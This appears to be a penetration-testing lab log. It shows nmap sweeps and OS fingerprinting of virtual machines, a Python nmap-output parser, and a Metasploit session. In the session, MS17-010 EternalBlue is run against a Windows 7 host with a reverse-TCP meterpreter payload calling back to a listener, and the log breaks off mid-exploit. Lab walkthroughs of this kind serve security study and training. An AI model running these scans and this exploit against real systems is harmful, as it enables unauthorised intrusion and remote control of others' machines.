Nmap scan report for 10.211.55.162Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.162 are filtered
Nmap scan report for 10.211.55.163Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.163 are filtered
Nmap scan report for 10.211.55.164Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.164 are filtered
Nmap scan report for 10.211.55.165Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.165 are filtered
Nmap scan report for 10.211.55.166Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.166 are filtered
Nmap scan report for 10.211.55.167Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.167 are filtered
Nmap scan report for 10.211.55.168Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.168 are filtered
Nmap scan report for 10.211.55.169Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.169 are filtered
Nmap scan report for 10.211.55.170Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.170 are filtered
Nmap scan report for 10.211.55.171Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.171 are filtered
Nmap scan report for 10.211.55.172Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.172 are filtered
Nmap scan report for 10.211.55.173Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.173 are filtered
Nmap scan report for 10.211.55.174Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.174 are filtered
Nmap scan report for 10.211.55.175Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.175 are filtered
Nmap scan report for 10.211.55.176Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.176 are filtered
Nmap scan report for 10.211.55.177Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.177 are filtered
Nmap scan report for 10.211.55.178Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.178 are filtered
Nmap scan report for 10.211.55.179Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.179 are filtered
Nmap scan report for 10.211.55.180Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.180 are filtered
Nmap scan report for 10.211.55.181Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.181 are filtered
Nmap scan report for 10.211.55.182Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.182 are filtered
Nmap scan report for 10.211.55.183Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.183 are filtered
Nmap scan report for 10.211.55.184Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.184 are filtered
Nmap scan report for 10.211.55.185Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.185 are filtered
Nmap scan report for 10.211.55.186Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.186 are filtered
Nmap scan report for 10.211.55.187Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.187 are filtered
Nmap scan report for 10.211.55.188Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.188 are filtered
Nmap scan report for 10.211.55.189Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.189 are filtered
Nmap scan report for 10.211.55.190Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.190 are filtered
Nmap scan report for 10.211.55.191Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.191 are filtered
Nmap scan report for 10.211.55.192Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.192 are filtered
Nmap scan report for 10.211.55.193Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.193 are filtered
Nmap scan report for 10.211.55.194Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.194 are filtered
Nmap scan report for 10.211.55.195Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.195 are filtered
Nmap scan report for 10.211.55.196Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.196 are filtered
Nmap scan report for 10.211.55.197Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.197 are filtered
Nmap scan report for 10.211.55.198Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.198 are filtered
Nmap scan report for 10.211.55.199Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.199 are filtered
Nmap scan report for 10.211.55.200Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.200 are filtered
Nmap scan report for 10.211.55.201Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.201 are filtered
Nmap scan report for 10.211.55.202Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.202 are filtered
Nmap scan report for 10.211.55.203Host is up (0.00063s latency).All 1000 scanned ports on 10.211.55.203 are filtered
Nmap scan report for 10.211.55.204Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.204 are filtered
Nmap scan report for 10.211.55.205Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.205 are filtered
Nmap scan report for 10.211.55.206Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.206 are filtered
Nmap scan report for 10.211.55.207Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.207 are filtered
Nmap scan report for 10.211.55.208Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.208 are filtered
Nmap scan report for 10.211.55.209Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.209 are filtered
Nmap scan report for 10.211.55.210Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.210 are filtered
Nmap scan report for 10.211.55.211Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.211 are filtered
Nmap scan report for 10.211.55.212Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.212 are filtered
Nmap scan report for 10.211.55.213Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.213 are filtered
Nmap scan report for 10.211.55.214Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.214 are filtered
Nmap scan report for 10.211.55.215Host is up (0.000026s latency).All 1000 scanned ports on 10.211.55.215 are filtered
Nmap scan report for 10.211.55.216Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.216 are filtered
Nmap scan report for 10.211.55.217Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.217 are filtered
Nmap scan report for 10.211.55.218Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.218 are filtered
Nmap scan report for 10.211.55.219Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.219 are filtered
Nmap scan report for 10.211.55.220Host is up (0.000024s latency).All 1000 scanned ports on 10.211.55.220 are filtered
Nmap scan report for 10.211.55.221Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.221 are filtered
Nmap scan report for 10.211.55.222Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.222 are filtered
Nmap scan report for 10.211.55.223Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.223 are filtered
Nmap scan report for 10.211.55.224Host is up (0.000025s latency).All 1000 scanned ports on 10.211.55.224 are filtered
Nmap scan report for 10.211.55.225Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.225 are filtered
Nmap scan report for 10.211.55.226Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.226 are filtered
Nmap scan report for 10.211.55.227Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.227 are filtered
Nmap scan report for 10.211.55.228Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.228 are filtered
Nmap scan report for 10.211.55.229Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.229 are filtered
Nmap scan report for 10.211.55.230Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.230 are filtered
Nmap scan report for 10.211.55.231Host is up (0.000028s latency).All 1000 scanned ports on 10.211.55.231 are filtered
Nmap scan report for 10.211.55.232Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.232 are filtered
Nmap scan report for 10.211.55.233Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.233 are filtered
Nmap scan report for 10.211.55.234Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.234 are filtered
Nmap scan report for 10.211.55.235Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.235 are filtered
Nmap scan report for 10.211.55.236Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.236 are filtered
Nmap scan report for 10.211.55.237Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.237 are filtered
Nmap scan report for 10.211.55.238Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.238 are filtered
Nmap scan report for 10.211.55.239Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.239 are filtered
Nmap scan report for 10.211.55.240Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.240 are filtered
Nmap scan report for 10.211.55.241Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.241 are filtered
Nmap scan report for 10.211.55.242Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.242 are filtered
Nmap scan report for 10.211.55.243Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.243 are filtered
Nmap scan report for 10.211.55.244Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.244 are filtered
Nmap scan report for 10.211.55.245Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.245 are filtered
Nmap scan report for 10.211.55.246Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.246 are filtered
Nmap scan report for 10.211.55.247Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.247 are filtered
Nmap scan report for 10.211.55.248Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.248 are filtered
Nmap scan report for 10.211.55.249Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.249 are filtered
Nmap scan report for 10.211.55.250Host is up (0.000027s latency).All 1000 scanned ports on 10.211.55.250 are filtered
Nmap scan report for 10.211.55.251Host is up (0.000032s latency).All 1000 scanned ports on 10.211.55.251 are filtered
Nmap scan report for 10.211.55.252Host is up (0.000023s latency).All 1000 scanned ports on 10.211.55.252 are filtered
Nmap scan report for 10.211.55.253Host is up (0.000021s latency).All 1000 scanned ports on 10.211.55.253 are filtered
Nmap scan report for 10.211.55.254Host is up (0.000022s latency).All 1000 scanned ports on 10.211.55.254 are filtered
Nmap scan report for 10.211.55.255Host is up (0.000020s latency).All 1000 scanned ports on 10.211.55.255 are filtered
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds
(base) ➜ ~
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.5
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:37 CST
Initiating ARP Ping Scan at 19:37
Scanning 10.211.55.5 [1 port]
Completed ARP Ping Scan at 19:37, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:37
Scanning windows-10.shared (10.211.55.5) [65535 ports]
Discovered open port 135/tcp on 10.211.55.5
Discovered open port 139/tcp on 10.211.55.5
Discovered open port 445/tcp on 10.211.55.5
Discovered open port 49664/tcp on 10.211.55.5
Discovered open port 49669/tcp on 10.211.55.5
Discovered open port 5040/tcp on 10.211.55.5
Discovered open port 49667/tcp on 10.211.55.5
Discovered open port 49668/tcp on 10.211.55.5
Discovered open port 49665/tcp on 10.211.55.5
Discovered open port 49671/tcp on 10.211.55.5
Discovered open port 49666/tcp on 10.211.55.5
Completed SYN Stealth Scan at 19:37, 41.72s elapsed (65535 total ports)
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00018s latency).
Not shown: 65524 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49671/tcp open  unknown
MAC Address: 00:1C:42:F4:4F:FE (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 41.79 seconds
           Raw packets sent: 69291 (3.049MB) | Rcvd: 65536 (2.621MB)
(base) ➜ ~ nmap -O 10.211.55.5
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
(base) ➜ ~ nmap -Pn -O 10.211.55.5
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
(base) ➜ ~ sudo nmap -O 10.211.55.5
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:40 CST
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00022s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:1C:42:F4:4F:FE (Parallels)
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows Longhorn|10|2008|7|Vista|8.1 (94%)
OS CPE: cpe:/o:microsoft:windows cpe:/o:microsoft:windows_10:1703 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_8.1
Aggressive OS guesses: Microsoft Windows Longhorn (94%), Microsoft Windows 10 1703 (92%), Microsoft Windows 10 1511 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 SP2 (91%), Microsoft Windows 7 SP1 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows 8 (91%), Microsoft Windows 10 1607 (91%), Microsoft Windows Vista SP1 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 5.43 seconds
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:41 CST
Initiating ARP Ping Scan at 19:41
Scanning 10.211.55.6 [1 port]
Completed ARP Ping Scan at 19:41, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:41
Scanning ubuntu-linux20.04.shared (10.211.55.6) [65535 ports]
Discovered open port 22/tcp on 10.211.55.6
Discovered open port 61616/tcp on 10.211.55.6
Discovered open port 8161/tcp on 10.211.55.6
Discovered open port 8088/tcp on 10.211.55.6
Completed SYN Stealth Scan at 19:41, 0.55s elapsed (65535 total ports)
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.000046s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
8088/tcp  open  radan-http
8161/tcp  open  patrol-snmp
61616/tcp open  unknown
MAC Address: 00:1C:42:B7:60:2B (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.61 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
(base) ➜ ~ sudo nmap -O 10.211.55.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:42 CST
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00019s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
MAC Address: 00:1C:42:B7:60:2B (Parallels)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/8%OT=22%CT=1%CU=37942%PV=Y%DS=1%DC=D%G=Y%M=001C42%TM
OS:=5F2E8FA2%P=x86_64-apple-darwin19.0.0)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z
OS:%II=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11
OS:NW7%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE
OS:88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=4
OS:0%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O
OS:=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40
OS:%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q
OS:=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y
OS:%DFI=N%T=40%CD=S)

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.23 seconds
(base) ➜ ~ sudo nmap -sS -p 1-65535 -v 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:43 CST
Initiating ARP Ping Scan at 19:43
Scanning 10.211.55.8 [1 port]
Completed ARP Ping Scan at 19:43, 0.00s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:43
Scanning windows-7sp1.shared (10.211.55.8) [65535 ports]
Discovered open port 445/tcp on 10.211.55.8
Discovered open port 135/tcp on 10.211.55.8
Discovered open port 139/tcp on 10.211.55.8
Discovered open port 49157/tcp on 10.211.55.8
Discovered open port 49156/tcp on 10.211.55.8
Discovered open port 49153/tcp on 10.211.55.8
Discovered open port 49155/tcp on 10.211.55.8
Discovered open port 49154/tcp on 10.211.55.8
Discovered open port 49152/tcp on 10.211.55.8
Completed SYN Stealth Scan at 19:44, 40.56s elapsed (65535 total ports)
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00010s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)

Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 40.63 seconds
           Raw packets sent: 69424 (3.055MB) | Rcvd: 65537 (2.622MB)
(base) ➜ ~ sudo nmap -O 10.211.55.8
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:44 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00017s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.78 seconds
(base) ➜ ~ nmap -O 10.211.55.8
TCP/IP fingerprinting (for OS scan) requires root privileges.
QUITTING!
(base) ➜ ~ sudo nmap -O 10.211.55.8
Password:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 20:13 CST
Nmap scan report for windows-7sp1.shared (10.211.55.8)
Host is up (0.00018s latency).
Not shown: 990 closed ports
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
3389/tcp  open  ms-wbt-server
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  unknown
MAC Address: 00:1C:42:B2:9C:23 (Parallels)
Device type: general purpose
Running: Microsoft Windows 7|2008|8.1
OS CPE: cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_server_2008::sp1 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.91 seconds
(base) ➜ ~
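The sweep above reports all 256 addresses as "up" because `-Pn` skips host discovery and treats every address as alive; only four hosts actually answered on a port, and the useful signal (which hosts expose SMB on 445/tcp, SSH, and so on) is buried in the "All 1000 scanned ports ... are filtered" noise. The following added example, which is not part of the original write-up, parses nmap's normal output into a per-host list of open ports and filters out the no-answer hosts so an assessor (or a defender reviewing an inventory scan) can triage the exposed services. The embedded sample output is constructed by hand to mirror the lab hosts on the page; it is not a fresh capture.

```python
import re
from collections import OrderedDict

# Constructed sample in nmap's normal output format, hand-written to match the
# lab hosts in the write-up (not the page's own capture). With -Pn, nmap skips
# host discovery and marks every address "up", so "256 hosts up" says nothing
# about which hosts exist; the "All ... filtered" entries are that noise.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-08 19:26 CST
Nmap scan report for 10.211.55.2
Host is up (0.0013s latency).
All 1000 scanned ports on 10.211.55.2 are closed
Nmap scan report for 10.211.55.3
Host is up (0.000022s latency).
All 1000 scanned ports on 10.211.55.3 are filtered
Nmap scan report for windows-10.shared (10.211.55.5)
Host is up (0.00068s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Nmap scan report for ubuntu-linux20.04.shared (10.211.55.6)
Host is up (0.00085s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
8088/tcp open  radan-http
Nmap done: 256 IP addresses (256 hosts up) scanned in 127.90 seconds
"""

REPORT_PREFIX = "Nmap scan report for "
# "hostname (1.2.3.4)" or a bare "1.2.3.4"
TARGET_RE = re.compile(r"^(?:(?P<name>\S+) \()?(?P<ip>[0-9A-Fa-f:.]+)\)?$")
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")
ALL_PORTS_RE = re.compile(r"^All \d+ scanned ports on \S+ are (?P<state>\w+)")


def parse_nmap_report(text):
    """Parse nmap normal output into an ordered {ip: host} mapping.

    Each host is {"name": hostname-or-None, "open": [(port, proto, service)],
    "all_ports": "filtered" | "closed" | None}. Only open ports are kept.
    """
    hosts = OrderedDict()
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith(REPORT_PREFIX):
            m = TARGET_RE.match(line[len(REPORT_PREFIX):])
            if not m:
                current = None
                continue
            current = {"name": m.group("name"), "open": [], "all_ports": None}
            hosts[m.group("ip")] = current
            continue
        if current is None:
            continue  # banner lines before the first host
        m = ALL_PORTS_RE.match(line)
        if m:
            current["all_ports"] = m.group("state")
            continue
        m = PORT_RE.match(line)
        if m and m.group("state") == "open":
            current["open"].append((int(m.group("port")), m.group("proto"), m.group("service")))
    return hosts


def hosts_with_open_ports(hosts):
    """Drop the -Pn noise: keep only hosts that answered on at least one port."""
    return OrderedDict((ip, h) for ip, h in hosts.items() if h["open"])


def hosts_exposing(hosts, port, proto="tcp"):
    """IPs that expose a given port, e.g. 445/tcp for the SMB attack surface."""
    return [ip for ip, h in hosts.items()
            if any(p == port and pr == proto for p, pr, _ in h["open"])]


def render_summary(hosts):
    """One line per host with open ports, for a quick triage list."""
    lines = []
    for ip, h in hosts_with_open_ports(hosts).items():
        label = f"{ip} ({h['name']})" if h["name"] else ip
        ports = ", ".join(f"{p}/{pr} {svc}" for p, pr, svc in h["open"])
        lines.append(f"{label}: {ports}")
    return lines


if __name__ == "__main__":
    parsed = parse_nmap_report(SAMPLE_NMAP_OUTPUT)
    print(f"{len(parsed)} hosts reported, {len(hosts_with_open_ports(parsed))} with open ports")
    for line in render_summary(parsed):
        print(line)
    print("SMB (445/tcp) exposed on:", hosts_exposing(parsed, 445))
```

Feed it the saved output of a real `nmap` run (`-oN`) instead of the sample and `hosts_exposing(parsed, 445)` gives the list of hosts that need the SMB patch-level check; on the page's lab that list is exactly the three Windows hosts the write-up goes on to probe.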

Exploitation - Windows MS17-010

(base) ➜ ~ msfconsole

       =[ metasploit v5.0.102-dev-37e0c7d01701fe276ef76f9e30d807261866e9df]
+ -- --=[ 2049 exploits - 1108 auxiliary - 344 post       ]
+ -- --=[ 562 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
Metasploit tip: View missing module options with show missing
msf5 > search ms17-010
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   5  exploit/windows/smb/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution

Interact with a module by name or index, for example use 5 or use exploit/windows/smb/smb_doublepulsar_rce
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.5
rhosts => 10.211.55.5
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[-] 10.211.55.5:445       - An SMB Login Error occurred while connecting to the IPC$ tree.
[*] 10.211.55.5:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.211.55.8
rhosts => 10.211.55.8
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rport 445
rport => 445
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.211.55.8:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 10.211.55.8:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use ms17_010_eternalblue
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+

Interact with a module by name or index, for example use 1 or use exploit/windows/smb/ms17_010_eternalblue_win8
msf5 auxiliary(scanner/smb/smb_ms17_010) > use 1[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8msf5 auxiliary(scanner/smb/smb_ms17_010) > use 0[-] Failed to load module: exploit/windows/smb/ms17_010_eternalblue_win8msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcpmsf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.211.55.8rhosts => 10.211.55.8msf5 exploit(windows/smb/ms17_010_eternalblue) > set rport 445rport => 445msf5 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 192.168.1.2:4444 [*] 10.211.55.8:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 10.211.55.8:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.211.55.8:445 - Scanned 1 of 1 hosts (100% complete)[*] 10.211.55.8:445 - Connecting to target for exploitation.[+] 10.211.55.8:445 - Connection established for exploitation.[+] 10.211.55.8:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.211.55.8:445 - CORE raw buffer dump (38 bytes)[*] 10.211.55.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima[*] 10.211.55.8:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [*] 10.211.55.8:445 - 0x00000020 50 61 63 6b 20 31 Pack 1 [+] 10.211.55.8:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.211.55.8:445 - Trying exploit with 12 Groom Allocations.[*] 10.211.55.8:445 - Sending all but last fragment of exploit packet[*] 10.211.55.8:445 - Starting non-paged pool grooming[+] 10.211.55.8:445 - Sending SMBv2 buffers[+] 10.211.55.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.211.55.8:445 - Sending final SMBv2 buffers.[*] 10.211.55.8:445 - Sending last fragment of exploit packet![*] 10.211.55.8:445 - Receiving response from exploit packet[+] 10.211.55.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.211.55.8:445 - Sending egg to corrupted connection.[*] 10.211.55.8:445 - Triggering free of corrupted buffer.[*] Sending stage (201283 bytes) to 